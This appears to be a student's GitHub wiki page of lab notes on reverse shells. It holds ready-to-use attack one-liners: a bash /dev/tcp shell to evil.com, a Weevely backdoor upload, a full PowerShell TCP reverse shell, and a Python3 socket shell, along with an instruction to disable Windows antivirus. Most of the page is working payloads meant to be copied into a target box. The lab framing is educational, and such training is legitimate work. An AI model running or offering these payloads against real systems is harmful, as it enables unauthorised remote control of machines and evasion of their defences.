Lab 8.2 Reverse Shells - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
Bash Reverse Shell
Source: Here
Step 1: Start a listener on the host box, in this case Kali
nc -nlvp 4449
Step 2: Connect to your host box from the target server
$ exec 5<>/dev/tcp/evil.com/8080
$ cat <&5 | while read line; do $line 2>&5 >&5; done
Step 3: On your host box, test a few commands underneath the listener. It should be executing on the target box and returning input to your host box
Wireshark Traffic
Follow the TCP stream of a packet between the target and host box
Reverse Shell Pippin
Using Weevely (Here's a reference), generate a weevely backdoor and upload it to the target server via FTP
ftp -i 10.0.5.25
Windows Reverse Shell
Something that I have come to learn about Windows is that the firewall denies first, asks questions later. To be able to do this one liner, you need to turn off Windows Anti Virus (AV). You do this through Windows Security
Windows Reverse Shell One Liner (for CMD.exe)
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.17.135',4449); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"\ # replace the 10.0.17.105 and 4449 with appropriate IP and Port
Python Reverse Shell
Python is capable of using one-liners to open a reverse shell on servers and connecting to a nc listening port.
Check which version, if any, of python is available on the target
which python
If this yields no positive results, try substituting python for python3 or python2. You may need to update the one liner accordingly.
Python3 one liner Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.17.105",4449));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' # copy and paste this into the target box AFTER running 'nc -nlvp 4449', replace the 10.0.17.105 and 4449 with appropriate IP and Port